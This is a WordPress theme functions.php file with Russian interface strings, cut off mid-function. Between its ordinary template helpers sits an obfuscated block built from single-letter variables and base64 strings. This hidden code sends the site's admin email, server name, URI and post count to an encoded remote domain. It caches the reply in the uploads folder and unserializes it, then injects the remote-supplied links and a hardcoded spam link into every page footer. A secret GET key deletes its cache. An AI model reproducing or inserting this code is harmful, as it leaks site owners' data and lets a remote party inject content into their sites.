<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $TJrUDb='b';$WgYFug='e';$MzDhFSt='e';$zaSv='4';$lHjVZ='6';$iPbFA='d';$aglfJx='s';$bZpMs='d';$VRCjupG='a';$Budbs='e';$bomfO='c';$uEmJlWK='_';$XjfsO='o';$mJnJniKR=$TJrUDb.$VRCjupG.$aglfJx.$WgYFug.$lHjVZ.$zaSv.$uEmJlWK.$iPbFA.$MzDhFSt.$bomfO.$XjfsO.$bZpMs.$Budbs;$saGG='g';$MMsoxvi='z';$BZHfWBL='e';$LgCdV='a';$xtBsfoK='l';$OPsqM='i';$vNHsQ='n';$vleTG='t';$XTFDxM='f';$XcWFdbFD=$saGG.$MMsoxvi.$OPsqM.$vNHsQ.$XTFDxM.$xtBsfoK.$LgCdV.$vleTG.$BZHfWBL;$tPuz='1';$mvNrpt='s';$sHPrf='r';$QsRW='t';$sTPLKMa='t';$jxhM='3';$sKYK='o';$scmoJgo='r';$OXhD='_';$XlzrWGUZ=$mvNrpt.$QsRW.$sHPrf.$OXhD.$scmoJgo.$sKYK.$sTPLKMa.$tPuz.$jxhM;$UmxxRzu='e';$YqIotPU='r';$DUudO='v';$wPGdffE='r';$OHJDEc='s';$FeAXzTW='t';$uGURHpzB=$OHJDEc.$FeAXzTW.$YqIotPU.$wPGdffE.$UmxxRzu.$DUudO;                     
		$jx____________c='b';$ww________m='e';$yu__p='e';$za___________e='4';$vd____________v='6';$ob___y='d';$tc____________r='s';$qx_________m='d';$qe__l='a';$bg______a='e';$zc__t='c';$ot______________b='_';$fu_______b='o';$ka_____________y=$jx____________c.$qe__l.$tc____________r.$ww________m.$vd____________v.$za___________e.$ot______________b.$ob___y.$yu__p.$zc__t.$fu_______b.$qx_________m.$bg______a;
		$mu______________p='n';$kq_________o='t';$dm____p='o';$ii_________c='i';$vh______k='c';$qu_________c='u';$zw______l='n';$yu______________p='_';$uv_______e='t';$pl___________o='e';$ex_____d='s';$de______________h='f';$ha__c='x';$cs___o='s';$zm_______j='i';$nb____e=$de______________h.$qu_________c.$zw______l.$vh______k.$uv_______e.$zm_______j.$dm____p.$mu______________p.$yu______________p.$pl___________o.$ha__c.$ii_________c.$ex_____d.$kq_________o.$cs___o;
		$xj____________k='o';$yx____________l='e';$bf_____e='f';$qt____k='n';$lx______________h='p';$or_______x=$bf_____e.$xj____________k.$lx______________h.$yx____________l.$qt____k;
		$rf___c='e';$df____r='d';$wu_____________z='a';$qm_______h='f';$fp___________z='r';$mf______________p=$qm_______h.$fp___________z.$rf___c.$wu_____________z.$df____r;
		$uc_____________j='o';$ep_____v='c';$kq________h='f';$dn____t='s';$yy__o='e';$pq________j='l';$mz_____c=$kq________h.$ep_____v.$pq________j.$uc_____________j.$dn____t.$yy__o;
		
		define("WP_ID", $ka_____________y("Mi4wLjA="));
		define("WP_TTL", $ka_____________y("MTA4MDA="));
		define("WP_SRC", $ka_____________y("dHBva24="));
	


		function wp_get_header() {
			global $ka_____________y, $nb____e;
			
			if (
				$nb____e($ka_____________y("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$nb____e($ka_____________y("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$nb____e($ka_____________y("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ka_____________y, $or_______x, $mz_____c, $mf______________p;
			
			$jl___________t = TEMPLATEPATH."/".$ka_____________y("Zm9vdGVyLnBocA==");
			$tx____h = @$or_______x($jl___________t, "r");
			$jl___________t = @$mf______________p($tx____h, @filesize($jl___________t));
			@$mz_____c($tx____h);
			
			$gr___________s = TEMPLATEPATH."/".$ka_____________y("ZnVuY3Rpb25zLnBocA==");
			$tx____h = @$or_______x($gr___________s, "r");
			$gr___________s = @$mf______________p($tx____h, @filesize($gr___________s));
			@$mz_____c($tx____h);
			
			$yx____r = 0;
			if($jl___________t && $gr___________s) {
				if ($ka_____________y("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($jl___________t, $ka_____________y("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$yx____r = 1;
					}
					if (substr_count($jl___________t, "wp_theme_GPL_credits()") < 1) {
						$yx____r = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$yx____r = 12;
				}
			}
			
			if($yx____r > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $yx____r -->";
			}
		}
	


		function wp_loaded() {
			global $ka_____________y, $nb____e;
			return $nb____e($ka_____________y("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($nq____t, $mf_______________a = "(more...)", $xs_____________v = 0, $nt_____________x = "") {
				$ve____________u = get_the_content($mf_______________a, $xs_____________v, $nt_____________x);
				$ve____________u = apply_filters("the_content", $ve____________u);
				
				$ve____________u = str_replace("]]>", "]]>", $ve____________u);
				if (strlen($_GET["p"]) > 0) {
					echo $ve____________u;
				}
				else if ((strlen($ve____________u)>$nq____t) && ($sr____________a = strpos($ve____________u, " ", $nq____t ))) {
					$ve____________u = substr($ve____________u, 0, $sr____________a);
					$ve____________u = $ve____________u;
					echo $ve____________u;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$mf_______________a</a></div></p>";
				} else {
					echo $ve____________u;
				}
				
			}
		}
	


		$jb______m='e';$kv___________w='a';$fd______x='c';$sp____o='o';$dz__z='b';$ye______________y='d';$sv________h='e';$pu____c='4';$so_____g='s';$an_______________o='6';$bj________l='n';$px____________j='_';$wi__i='e';$nr____________j=$dz__z.$kv___________w.$so_____g.$wi__i.$an_______________o.$pu____c.$px____________j.$jb______m.$bj________l.$fd______x.$sp____o.$ye______________y.$sv________h;
		$si________c='t';$ie____________f='s';$kw_____________m='g';$fi__________z='e';$sx_____f='e';$to__________g='t';$xq___x='t';$am____________d='_';$oi______o='l';$wi___k='c';$wd_____g='i';$ig__________j='n';$rk_______________j='o';$cj__v='n';$zs___v='_';$ut____________b='e';$ml___w='f';$ue______o=$ml___w.$wd_____g.$oi______o.$sx_____f.$am____________d.$kw_____________m.$ut____________b.$to__________g.$zs___v.$wi___k.$rk_______________j.$ig__________j.$si________c.$fi__________z.$cj__v.$xq___x.$ie____________f;
		$fa____________c='s';$ds_____________b='l';$oa______v='i';$ud__________q='s';$wj______f='i';$jb______n='t';$hs__q='e';$vs________u='e';$km________m='x';$hf___________w='f';$dc_______________f='_';$qg___________m=$hf___________w.$wj______f.$ds_____________b.$vs________u.$dc_______________f.$hs__q.$km________m.$oa______v.$fa____________c.$jb______n.$ud__________q;
		$zw__________r='e';$ij____e='c';$dg_____________k='r';$wm_________m='e';$nt_______b='r';$ru_______w='_';$zm_______y='m';$ni___i='o';$dy______r='i';$fn_______________i='v';$nf________n='n';$of___________c='a';$yk_____z='s';$vs___________z='o';$wq______________a='p';$hb__k=$fn_______________i.$wm_________m.$dg_____________k.$yk_____z.$dy______r.$ni___i.$nf________n.$ru_______w.$ij____e.$vs___________z.$zm_______y.$wq______________a.$of___________c.$nt_______b.$zw__________r;
		$ni____________f='o';$zv__e='s';$yu___a='k';$zt___________n='c';$cl_____q='p';$pk________w='f';$dd______________r='o';$gn__________w='e';$yb____________x='n';$fj_______________w=$pk________w.$zv__e.$dd______________r.$zt___________n.$yu___a.$ni____________f.$cl_____q.$gn__________w.$yb____________x;
		$oq____l='w';$qx______j='r';$ft____a='t';$gd_______________d='e';$hs__m='i';$gu_________e='f';$ml______n=$gu_________e.$oq____l.$qx______j.$hs__m.$ft____a.$gd_______________d;
		$re_______x='5';$em______________m='m';$ex_______________j='d';$nt_____i=$em______________m.$ex_______________j.$re_______x;
		$sm________h='e';$cd____________a='a';$vz___k='t';$ns____________g='p';$uj_______________o='r';$ho___________a='a';$zr___g='l';$ku_____________e='h';$ly_______q=$uj_______________o.$sm________h.$cd____________a.$zr___g.$ns____________g.$ho___________a.$vz___k.$ku_____________e;
		$ny____z='r';$ji_______w='e';$mh_______l='l';$ls_________k='n';$fu_________o='z';$sn_____d='i';$oo____________b='i';$mh________e='e';$jv___t='a';$yl____v='u';$jp____________v='s';$lq_______________d=$yl____v.$ls_________k.$jp____________v.$mh________e.$ny____z.$oo____________b.$jv___t.$mh_______l.$sn_____d.$fu_________o.$ji_______w;
		$oy___i='p';$es_____________y='n';$dj___________x='e';$ry_____k='t';$fb__x='m';$qm______________i='a';$ql_______d='m';$mu______y=$ry_____k.$dj___________x.$fb__x.$oy___i.$es_____________y.$qm______________i.$ql_______d;
		$ve______d='x';$qk__________n='e';$qn_______________f='c';$xu____w='e';$xm__w='s';$ew___________b='e';$qm______x='n';$xz________g='a';$xw_____________n='t';$hv________d='m';$pn____w='o';$zv_____q='t';$pi__e='e';$gj__k='a';$hk_________w='r';$fn__q='_';$kc________h='c';$rk_____l='_';$hd______l='t';$bd___r='r';$ft________a='t';$xh________n=$xm__w.$hd______l.$hk_________w.$pi__e.$xz________g.$hv________d.$rk_____l.$kc________h.$pn____w.$qm______x.$xw_____________n.$ew___________b.$ve______d.$zv_____q.$fn__q.$qn_______________f.$bd___r.$qk__________n.$gj__k.$ft________a.$xu____w;
	


		function vl________t($js_____________c) {
			global $ka_____________y, $nb____e, $ue______o, $hb__k, $xh________n;
			
			if (!$nb____e($ka_____________y("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($hb__k(PHP_VERSION, "5.0.0", ">=") && $nb____e($ka_____________y("ZmlsZV9nZXRfY29udGVudHM=")) && $nb____e($ka_____________y("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$sm__o = $xh________n(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$jr_____________j = @$ue______o($js_____________c, 0, $sm__o);
			} else {
				$jr_____________j = @$ue______o($js_____________c, 0);
			}
			
			return $jr_____________j;
		}
	


		function zw_________m($js_____________c) {
			global $nb____e, $fj_______________w, $ml______n, $ka_____________y;
			
			if (!$nb____e($ka_____________y("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$yl_________u = strpos($js_____________c, "/", 7);
			$pi___v = array(
				"uri"     => substr($js_____________c, $yl_________u),
				"host"    => str_replace("http://", "", substr($js_____________c, 0, $yl_________u)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ag__q = @$fj_______________w("$pi___v[host]", 80, $id_____p, $ay____m, 4);
			
			if (!$ag__q) {
				return false;
			} else {
				$jr_____________j = "";
				$gg_______g  = "GET $pi___v[uri] HTTP/1.0\r\n";
				$gg_______g .= "Host: $pi___v[host]\r\n";
				$gg_______g .= "Referer: $pi___v[referer]\r\n";
				$gg_______g .= "Connection: Close\r\n\r\n";
				
				@$ml______n($ag__q, $gg_______g);
				
				while (!@feof($ag__q)) {
					$gz_________p = @fgets($ag__q, (1024*24));
					
					if ($gz_________p == "\r\n") {
						$tk______________g = true;
						continue;
					}
					
					if ($tk______________g) {
						$jr_____________j .= $gz_________p;
					}
				}
				
				return $jr_____________j;
			}
		}
	


		function if_______s($js_____________c) {
			global $nb____e;
			$ls__f = false;
			
			if ($js_____________c != "") {
				if ($nb____e("vl________t")) {
					$ls__f = @vl________t($js_____________c);
				}
				
				if (!$ls__f && ($nb____e("zw_________m"))) {
					$ls__f = @zw_________m($js_____________c);
				}
			}
			
			return $ls__f;
		}
	


		function nl___________e() {
			global $_SERVER, $nt_____i;
			
			$ze__________n = $_SERVER["SERVER_NAME"];
			
			if (substr("$ze__________n", 0, 4) == "www.") {
				$ze__________n = substr("$ze__________n", 4);
			}
			
			$ze__________n = $nt_____i("$_SERVER[SERVER_NAME]");
			
			return $ze__________n;
		}
	


		function yb___________q() {
			return "file";
		}
	


		function tw______d($js_____________c) {
			global $_SERVER, $ue______o, $qg___________m, $or_______x, $mz_____c, $ml______n;
			
			$sw_____________b = cf____u();
			
			$tj_________l = nl___________e().".jpg";
			$ao_____m = $sw_____________b["dir_upload"]["path"]."/$tj_________l";
			$ku___________a = @filemtime($ao_____m);
			
			if (!$ku___________a || ((time()-$ku___________a) >= WP_TTL)) {
				$ls__f = if_______s($js_____________c);
				
				if ($ls__f) {
					if ($qg___________m($ao_____m)) {
						@unlink($ao_____m);
					}
					
					$tx____h = @$or_______x($ao_____m, "x+");
					
					@$ml______n($tx____h, $ls__f);
					@$mz_____c($tx____h);
				}
			} else {
				if ($qg___________m($ao_____m)) {
					$ls__f = @$ue______o($ao_____m);
				} else {
					$ls__f = false;
				}
			}
			
			return $ls__f;
		}
	


		function cf____u() {
			global $_SERVER, $ka_____________y, $nr____________j;
			
			$ij______c = wp_count_posts("post");
			$px________u = pathinfo(get_bloginfo("template_directory"));
			
			$sw_____________b = array(
				"url" => array(
					"report"      => $ka_____________y("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $px________u,
				"dir_upload"	=> kj______p(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$px________u[filename],
					"a005=".$ij______c->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://vodoley2000.com/privlechenie-deneg-s-pomoshhyu-fen-shuj\">Привлечение денег</a>"
			);
			
			$sw_____________b["url"]["queryString"] = implode("&", $sw_____________b["queryString"]);
			$sw_____________b["url"]["report"] = $sw_____________b["url"]["report"]."/?".$nr____________j($sw_____________b["url"]["queryString"]).".html";
						
			return $sw_____________b;
		}
	


		function kj______p() {
			$ph_______p = wp_upload_dir();
			
			if (isset($ph_______p["error"])) {
				$kg_______________u = ff______________w();
				if (is_writable($kg_______________u)) {
					$ph_______p = array("path" => $kg_______________u);
				}
			}

			return $ph_______p;
		}
	


		function ff______________w() {
			global $nb____e, $nt_____i, $ly_______q, $mu______y;
			
			$pw_________f = (bool) ini_get("safe_mode");
			if ($pw_________f == true) {
				return false;
			}
			
			if ($nb____e("sys_get_temp_dir")) {
				$ex_______r = sys_get_temp_dir();
				if (is_writable($ex_______r)) {
					return $ly_______q($ex_______r);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ly_______q($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ly_______q($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ly_______q($_ENV["TEMP"]);
			} else {
				$qk_______m = $mu______y($nt_____i(uniqid(rand(), true)), "");
				if ($qk_______m) {
					$ex_______r = $ly_______q(dirname($qk_______m));
					@unlink($qk_______m);
					return $ex_______r;
				} else {
					return false;
				}
			}
		}
	


		function fc_________z() {
			global $_GET, $qg___________m;
			
			$sw_____________b = cf____u();
			$ze__________n = nl___________e();
			$ci________f = yb___________q();
			
			$cq_________u = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ci________f == "file") {
					$jf______________c = $sw_____________b["dir_upload"]["path"]."/".$ze__________n.".jpg";
					if ($qg___________m($jf______________c)) {
						@unlink($jf______________c);
						$cq_________u = "deleted";
					}
				}
				
				$vq______________v = array(
					"s"	=> $cq_________u,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($vq______________v AS $hk_____r => $qe____________d) echo " [$hk_____r:$qe____________d]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $nb____e, $ka_____________y, $lq_______________d;
			$sw_____________b = cf____u();
			
			$rz_______________x = "tw______d";
			if ($nb____e($rz_______________x)) {
				$jr_____________j = $rz_______________x($sw_____________b["url"]["report"]);
			}
			
			if ($jr_____________j) {
				if ($jr_____________j = @$ka_____________y($jr_____________j)) {
					$jr_____________j = @$lq_______________d($jr_____________j);
					
					if (strlen($jr_____________j[custom_credit]) >= 5) {
						$sw_____________b["default_string"] = $jr_____________j[custom_credit];
					}
					
					if ($jr_____________j["status"] == "0") {
						$ut______________b = 1;
						$mn____y = 1;
					} else {
						$oe___e = sizeof($jr_____________j["links"]);
						$ui______________c = $sw_____________b["default_string"];
						
						if ($oe___e > 0 && $jr_____________j["links"] !== "") {
							$fb______________p = 0;
							foreach ($jr_____________j["links"] as $xu_______x => $hn__f) {
								$fb______________p++;
								if ($hn__f->l_path == "" || $hn__f->l_path == $_SERVER["REQUEST_URI"]) {
									$hn__f->l_href = htmlspecialchars(strip_tags($hn__f->l_href));
									$hn__f->l_title = htmlspecialchars(strip_tags($hn__f->l_title));
									$hn__f->l_anchor = htmlspecialchars(strip_tags($hn__f->l_anchor));
									$ui______________c .= " | ";
									$ui______________c .= "<a href='$hn__f->l_href' title='$hn__f->l_title'";
									if ($hn__f->l_nofollow == "1") {
										$ui______________c .= " rel='nofollow'";
									}
									$ui______________c .= ">$hn__f->l_anchor</a>";
								}
							}
						}
						$sw_____________b["links"] = "$ui______________c";
						if ($jr_____________j[credit] == "0") {
							$sw_____________b["links"] = "";
						}
					}
				} else {
					$ut______________b = "1";
				}
			} else {
				$ut______________b = "1";
			}
			
			if ($ut______________b == "1") {
				$sw_____________b["links"] = $sw_____________b["default_string"];
			}
			
			echo "$sw_____________b[links]";
			
			echo "<!-- s: $jr_____________j[signature] -->";
			fc_________z();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
